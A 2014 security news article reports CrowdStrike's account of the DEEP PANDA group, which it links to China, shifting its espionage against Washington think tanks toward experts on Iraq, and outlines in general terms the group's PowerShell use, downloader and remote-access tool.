The folks over at CrowdStrike have dug deep into a campaign of targeted cyber attacks targeting Washington D.C. think tanks and say they have evidence that whomever is behind the attacks has taken a sudden interest in U.S. policy towards Iraq.
Editor’s Note: This story was updated to include comments from Adam Meyers, Vice President of Security Intelligence at CrowdStrike. – PFR July 8, 2014 14:30
Writing on Tuesday, CrowdStrike CTO Dmitri Alperovitch described a new campaign by a group they dubbed “DEEP PANDA” that was targeting think tanks specializing on U.S. foreign policy and national security. Alperovitch said CrowdStrike observed a pronounced shift in targets from think tank experts on Asia to experts on Iraq and the Middle East in recent weeks. The shift corresponded with the rapid escalation of violence in Iraq as the Islamic extremist group ISIS took control of large parts of the country.
“This actor, who was engaged in targeting and collection of Southeast Asia policy information, suddenly began targeting individuals with a tie to Iraq/Middle East issues,” Alperovitch wrote. “This is undoubtedly related to the recent Islamic State of Iraq and the Levant (ISIS) takeover of major parts of Iraq and the potential disruption for major Chinese oil interests in that country.”
The group that is believed, by CrowdStrike, to be behind the attack, DEEP PANDA, has been operating for at least three years and has a reputation for stealth and sophistication, Alperovitch wrote. Past targets have included government, defense, financial, legal, and the telecommunications industries. Previous reports by the company (PDF) have labeled DEEP PANDA a state sponsored hacking group within The People’s Republic of China.
In attacks on the think tanks, the DEEP PANDA hackers
used stolen user credentials to gain access to local hosts on the target network used SQL injection and other remote attacks on public facing infrastructure to gain access to the vendor network. They then used Powershell scripts deployed as scheduled tasks on the compromised hosts to move laterally within the target network, said Adam Meyers, the Vice President of Security Intelligence at CrowdStrike. Using Powershell allowed the group to avoid the need to place an executable file on the target machine – a move that stood the risk of being noticed by antivirus software.
Other tools used in the hacks included a .NET executable (typically named Wafer), which in turn typically downloads and runs the MadHatter .NET Remote Access Tool (RAT), one of the favorites of DEEP PANDA.
The group’s malicious tools typically run in memory on compromised machines, making them difficult to detect by forensic examiners, said Meyers.
“We’ve seen them use a four-byte or five-byte backdoor. It’s literally just a few lines of code,” he said. “These guys are pretty slick. They’re definitely players.”
The attackers targeted specific experts within the think tanks, using malware to collect and export Microsoft Word and Powerpoint files, among others. Meyers said attackers have also been observed moving from high-profile think tank employees to other targets within government agencies like the Department of Defense and Department of State.
The goal, said Alperovitch was to gain insights into possible U.S. moves in Iraq. China has become a major investor in Iraq’s oil sector in the years since the U.S. invasion of the country and the overthrow of Saddam Hussein.
Meyers said that the targets in the latest attacks are almost all Washington D.C. “Beltway” area think tanks. CrowdStrike was already working with many of the think tanks on a pro bono basis, because they are frequent targets of attacks, but typically lack the budget for expensive cyber security and remediation services.
However, the attacks are not limited to think tanks. Meyers said law firms doing business on behalf of competitors to Mainland firms or engaged in international litigation should be concerned about similar attacks. “We’ve seen them really touching all things China related, he said.
Read more about CrowdStrike’s research here: Deep in Thought: Chinese Targeting of National Security Think Tanks | CrowdStrike.